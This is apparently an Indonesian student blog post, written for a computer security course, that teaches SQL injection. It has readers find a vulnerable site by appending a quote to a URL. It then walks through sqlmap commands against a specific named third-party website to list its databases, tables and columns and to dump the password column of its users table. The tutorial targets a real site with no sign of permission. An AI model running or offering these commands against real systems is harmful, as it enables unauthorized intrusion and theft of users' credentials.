Tutorial Sql Injection (Kelompok Sistem Keamanan Komputer)
Kenny Habiburahman 1715015057
Ruri Widi Priatna 1715015050
Andri Juliantara 1715015076
Fery Irawan 1715015078
M. Fadilah Setiarso 1715015061
Ruri Widi Priatna 1715015050
Andri Juliantara 1715015076
Fery Irawan 1715015078
M. Fadilah Setiarso 1715015061
Tutorial Sql Injection
Catatan :
Carilah terlebih dahulu web yang ingin di inject dan
pastikan bahwa web ini bisa dilakukan inject dengan cara salah satunya akhiran
link dikasih ( ‘ ).
Contoh :
http://www.ipicgroup.com/shopping_centre.php?id=1
Menjadi :
http://www.ipicgroup.com/shopping_centre.php?id=’
jika terjadi error maka web bisa di inject.
Ini adalah web yang ingin di inject.
Buka kalilinux lalu buka terminalnya ketikkan
“sqlmap” lalu enter
Ketikkan lagi “sqlmap -u LinkWebYangDiInject --dbs”
untuk mendapatkan database dari web.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1
--dbs)
Database yang sudah didapat.
Ketikkan lagi “sqlmap -u LinkWebYangDiInject –D
NamaDatabase --tables” untuk membuka database dan melihat tabel.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1
–D ipicgr_db1 -- tables)
Nama table didapatkan.
Ketikkan lagi “sqlmap -u LinkWebYangDiInject –D
NamaDatabase –T NamaTable --columns” untuk membuka tabel yang ingin dibuka dan
melihat columns.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1
–D ipicgr_db1 –T users --columns)
Columns dalam table sudah didapatkan.
Ketikkan lagi “sqlmap -u LinkWebYangDiInject –D
NamaDatabase –T NamaTable –c NamaColumns --dump” untuk membuka column yang
ingin dibuka.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1
–D ipicgr_db1 –T users –C password --dump)
Columns password telah didapat.
Komentar
Posting Komentar